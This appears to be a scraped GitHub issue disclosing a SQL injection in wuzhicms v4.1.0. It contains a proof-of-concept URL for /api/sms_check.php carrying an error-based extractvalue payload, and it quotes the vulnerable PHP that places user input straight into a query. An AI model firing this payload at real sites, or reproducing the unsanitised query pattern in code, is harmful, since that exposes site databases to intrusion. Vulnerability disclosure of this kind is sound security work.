The $code parameter is taken directly into the execution of the get_one function without any filtering. The get_one function also detects the incoming SQL filtering, resulting in SQL injection.
The official website has been reproduced successfully.
The text was updated successfully, but these errors were encountered:
love71
changed the title
五指CMS v4.1.0前台存在SQL注入
wuzhicms v4.1.0 have a sqli in the front
May 28, 2018
POC:
/api/sms_check.php?param=1%27and extractvalue(1,concat(0x7e,user()))%23
Vulnerability file: /api/sms_check.php
define('WWW_ROOT',substr(dirname(FILE), 0, -4).'/');
require '../configs/web_config.php';
require COREframe_ROOT.'core.php';
if(!isset($GLOBALS['param'])) {
exit('{"info":"验证失败","status":"n"}');
} elseif($GLOBALS['param']=='') {
exit('{"info":"验证失败","status":"n"}');
}
$code = strip_tags($GLOBALS['param']);
$posttime = SYS_TIME-300;//5分钟内有效
$db = load_class('db');
$r = $db->get_one('sms_checkcode',"
code='$code' ANDposttime>$posttime",'*',0,'id DESC');if($r) {
exit('{"info":"验证通过","status":"y"}');
} else {
exit('{"info":"验证失败","status":"n"}');
}
The $code parameter is taken directly into the execution of the get_one function without any filtering. The get_one function also detects the incoming SQL filtering, resulting in SQL injection.
The official website has been reproduced successfully.
The text was updated successfully, but these errors were encountered: